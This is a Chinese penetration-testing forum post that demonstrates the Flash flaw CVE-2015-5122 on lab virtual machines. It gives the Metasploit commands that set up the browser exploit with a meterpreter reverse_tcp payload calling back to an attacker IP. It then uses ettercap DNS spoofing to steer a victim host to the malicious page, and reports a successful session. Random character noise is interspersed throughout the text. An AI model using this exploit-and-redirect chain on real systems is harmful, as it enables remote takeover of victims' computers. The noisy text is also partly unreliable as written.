中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin 时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

( h& }" ]2 H& U) Q. e) r- h. d. W, R 二、cve2015-5122漏洞实例演示虚拟机 ( k- F4 }+ `. \/ G/ _2 h- n2 n

" G; w: D* B" Y- G+ `+ I, [" s 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 9 h1 ^6 h; {% k8 f

) m" n2 z, k2 I& k! @ search cve-2015-5122如图： ) m6 E0 b& E* m0 @" w

6 O% u# g4 O0 S+ U3 e3 z/ Z" Y " y0 y8 [# z" P. E$ C

0 }* u& n+ P5 B 下面我们敲如下命令： 0 {4 n! T; }) f. I

* R; f; j ~" r8 e/ V' u& b% s) ] use exploit/multi/browser/adobe_flash_opaque_background_uaf . ~/ ?' C& u. N& Y3 w& D

6 C$ |; H0 Z3 |; ` set PAYLOAD windows/meterpreter/reverse_tcp . Z7 m7 Y* S4 T% D; f0 a) j' U" t

! |6 T S' t" t3 @6 y3 _ set LHOST 192.168.0.109 8 Z4 v1 }3 r1 A8 A4 @

; o% Y% I1 e* g8 J# Z% M. ^) N set URIPATH / /*根目录*/ 2 f% W1 m! l3 C; X! g

# B* h" y, J4 U$ ]" v1 e( Z6 G6 @* H% k3 n set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 c% [. E* j* }+ P, B

* n0 R/ C8 C, P set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 2 i% a' B% l: E( Y6 ?

3 E! a( r5 ?1 f" ^! g5 Z 然后show options如图： ( n0 a! |4 G: h4 q Z# U

8 m6 J& Q, i c6 D1 b5 i+ D. p5 W / f6 ~# H; y/ U& t/ y' [+ P

8 j7 S: h. B7 l5 z* D" I* y/ @ 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
3 H6 U5 \$ ^" _8 Z+ N/ l ' j0 Z6 a& r: B1 p0 b( O5 x+ C4 h

0 L; d! {) ~& _- V7 L$ R 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 + [* S" H' N, [" R J' [7 t, p

9 b3 ~) `8 j# | Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf 3 z$ l# J4 y6 d8 V0 ]6 D

/ Z% l/ C; N9 L" e : B: U ? ^9 z& M# L- N

8 x& r+ t6 x8 \1 ]; _" J* c4 z 成功了，这时候我们断开ettercap，如图： ' b! L$ }8 W- A' C) X& E# o

8 X3 q0 ~4 s w1 W! a( I+ ?9 {6 T+ @ ; x+ _9 ^( p a I' N; {' h( s

! c, S( { W+ a Screenshot如图： - \% o: I/ L5 L1 J1 i( c: z, a

+ Z* \* Y; X( Y: n+ F& [! ^ } : a- x8 d# l; t; t4 n9 U

+ \6 f R2 D p 5 m( j1 e8 T; f* l/ C& N' ~

欢迎光临中国网络渗透测试联盟 (https://www.cobjon.com/)